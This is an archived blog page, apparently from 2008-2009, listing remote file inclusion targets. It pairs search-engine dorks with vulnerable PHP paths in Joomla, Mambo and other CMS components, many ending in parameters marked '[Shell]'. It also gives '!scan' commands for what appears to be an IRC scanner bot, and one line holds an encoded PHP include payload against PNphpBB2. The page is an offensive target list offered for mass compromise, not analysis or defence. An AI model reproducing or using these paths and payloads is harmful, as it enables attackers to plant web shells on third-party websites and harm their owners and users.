More Than Just A Blog

Archive for the ‘Bug Dork’ Category

Protected: januari 2009 bug list

Posted by: Bug Dork on: January 31, 2009

There is no excerpt because this is a protected post.

December 2008 bug dork list

Posted by: Bug Dork on: January 1, 2009

Last Update 17-12-2008
http://bugdork.wordpress.com/

!scan ///////?cmd&file= “List Users with Pics only?”
!scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= /MODx/
!scan /include/scripts/export_batch.inc.php?DIR= ModernBill
!scan /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path= technote7
!scan /?sIncPath= “BoonEx- Community Software; Dating And Social Networking Scripts; Video Chat And More.”
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement – © 2002-2004 by Christian Scheb – Stylemotion.de
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement
!scan ?custompluginfile[]= index.php?categoryid=5
!scan ?custompluginfile[]= index.php?categoryid=10
!scan ?custompluginfile[]= index.php?categoryid=15
!scan index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path= %22%2Fincludes%2Fjoomla.php%22
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal [...]

Tags: ,

All Of the Mambo & Joomla Script Remote File Inclussion Bugs..

Posted by: Bug Dork on: December 13, 2008

Dork:
com_comprofiler
Expl:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:com_multibanners
Expl:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:com_colophon
expl:
administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:index.php?option=[Shell]com_simpleboard
Expl:
/components/com_simpleboard/file_upload.php?sbp=[Shell]
Dork:
inurl:”com_hashcash”
Expl:
/components/com_hashcash/server.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:”com_htmlarea3_xtd-c”
Expl:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:”com_sitemap”
Expl:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:”com_forum”
Expl:
/components/com_forum/download.php?phpbb_root_path=[Shell]

Dork:
inurl:”com_pccookbook”
Expl:
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:index.php?option=[Shell]com_extcalendar
Expl:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:”minibb”
Expl:
/components/minibb/index.php?absolute_path=[Shell]
-
Dork:
inurl:”com_smf”
Expl:
/components/com_smf/smf.php?mosConfig_absolute_path=[Shell]
Expl:
/modules/mod_calendar.php?absolute_path=[Shell]
Dork:
inurl:”com_pollxt”
Expl:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:”com_loudmounth”
Expl:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:”com_videodb”
Expl:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:index.php?option=[Shell]com_pcchess
Expl:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:”com_multibanners”
Expl:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:”com_a6mambohelpdesk”
Expl:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=[Shell]
Dork:
inurl:”com_colophon”
Expl:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:”com_mgm”
Expl:
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:”com_mambatstaff”
Expl:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:”com_securityimages”
Expl:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=[Shell]
Expl:
/components/com_securityimages/lang.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:”com_artlinks”
Expl:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:”com_galleria”
Expl:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=[Shell]

Joomla Bug

Posted by: Bug Dork on: December 12, 2008

/?mosConfig_absolute_path=
/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=
/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=
/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
/administrator/components/com_color/admin.color.php?mosConfig_live_site=
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=
/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=
/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=
/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=
/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=
/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=
/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=
/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=
/akocomments.php?mosConfig_absolute_path=
/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=
/component/com_events/includes/comutils.php?mosConfig_absolute_path=
/component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=
/components/calendar/com_calendar.php?absolute_path=
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
/components/com_calendar.php?absolute_path=
/components/com_cpg/cpg.php?mosConfig_absolute_path=
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
/components/com_facileforms/facileforms.frame.php?ff_compath=
/components/com_forum/download.php?phpbb_root_path=
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
/components/com_hashcash/server.php?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
/components/com_jcs/jcs.function.php?mosConfig_absolute_path=
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=
/components/com_jombib/BibTex.php?mosConfig_absolute_path=
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
/components/com_mambowiki/MamboLogin.php?IP=
/components/com_minibb.php?absolute_path=
/components/com_moodle/moodle.php?mosConfig_absolute_path=
/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=
/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=
/components/com_mospray/scripts/admin.php?basedir=
/components/com_mp3_allopass/allopass.php?mosConfig_live_site=
/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
/components/com_performs/performs.php?mosConfig_absolute_path=
/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
/components/com_simpleboard/image_upload.php?sbp=
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path=
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=
/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=
/components/com_zoom/includes/database.php?mosConfig_absolute_path=
/components/minibb/index.php?absolute_path=
/database.php?mosConfig_absolute_path=
/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=
/includes/adminAvatars.php?GlobalSettings[templatesDirectory]=
/includes/adminSmileys.php?GlobalSettings[templatesDirectory]=
/includes/functions_cms.php?phpbb_root_path=
/includes/move.php?GlobalSettings[templatesDirectory]=
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=
/index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=
/index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=
/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=
/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=
/index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=
/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=
/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=
/index.php?option=com_log&Itemid=&mosConfig_absolute_path=
/index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=
/index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=
/index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=
/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=
/index2.php?mosConfig_absolute_path=
/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=
/mod_cbsms_messages.php?mosConfig_absolute_path=
/modules/calendar/mod_calendar.php?absolute_path=
/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=
/modules/mod_as_category.php?mosConfig_absolute_path=
/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=
/modules/mod_calendar.php?absolute_path=
/modules/mod_header_image.php?mosConfig_absolute_path=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/modules/mod_weather.php?absolute_path=
/templates/be2004-2/index.php?mosConfig_absolute_path=
/libraries/pcl/pcltar.php?g_pcltar_lib_dir=

Six

Posted by: Bug Dork on: December 7, 2008

http://bugdork.wordpress.com/
!scan /mindmeld/acweb/admin_index.php?MM_GLOBALS[home]= “mindmeld”
!scan /phplinks/includes/smarty.php?full_path_to_public_program= PHP Links
!scan /index.php?option=com_custompages&cpage= com_custompages&cpage
!scan /index.php?option=com_custompages&cpage= com_custompages
!scan /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a= “index.php?name=PNphpBB2″
!scan /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a= “index.php?name=PNphpBB2″
!scan /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight= “index.php?name=PNphpBB2″
!scan /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “com_comprofiler” “com_comprofiler”
!scan /includes/mailaccess/pop3.php?CONFIG[pear_dir]= “mailaccess”
!scan /includes/functions_portal.php?phpbb_root_path= “phpbb” “phpbb”
!scan /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf= “MakeXML4statusCounter.php” “MakeXML4statusCounter.php”
!scan /inc/cmses/aedatingCMS.php?dir%5Binc%5D= “cmses” “cmses”
!scan /import_export/pages/index.inc.php?REX[INCLUDE_PATH]= “Redaxo 2.7.4″ “Redaxo 2.7.4″
!scan /faqsupport/samplefaqsupport.php?path[docroot]= “OneAdmin” “OneAdmin”
!scan /ecommerce/payment/cybersource.php?path[docroot]= “ecommerce”
!scan /doceboCms/class/class.dashboard_cms.php?where_framework= “doceboCms” “doceboCms”
!scan /config/dbutil.bck.php?confdir= “/config/dbutil.bck.php”
!scan /config.inc.php?config%5broot_dir%5d= “CLASSIFIEDS”
!scan /claroline/tracking/userLog.php?rootSys= /claroline/ /claroline/
!scan /claroline/phpbb/page_tail.php?includePath= /claroline/ /claroline/
!scan /citywriter/head.php?path= /citywriter/
!scan [...]


 

July 2009
M T W T F S S
« Jun    
 12345
6789101112
13141516171819
20212223242526
2728293031  

Archives

Blog Stats

  • 108,480 hits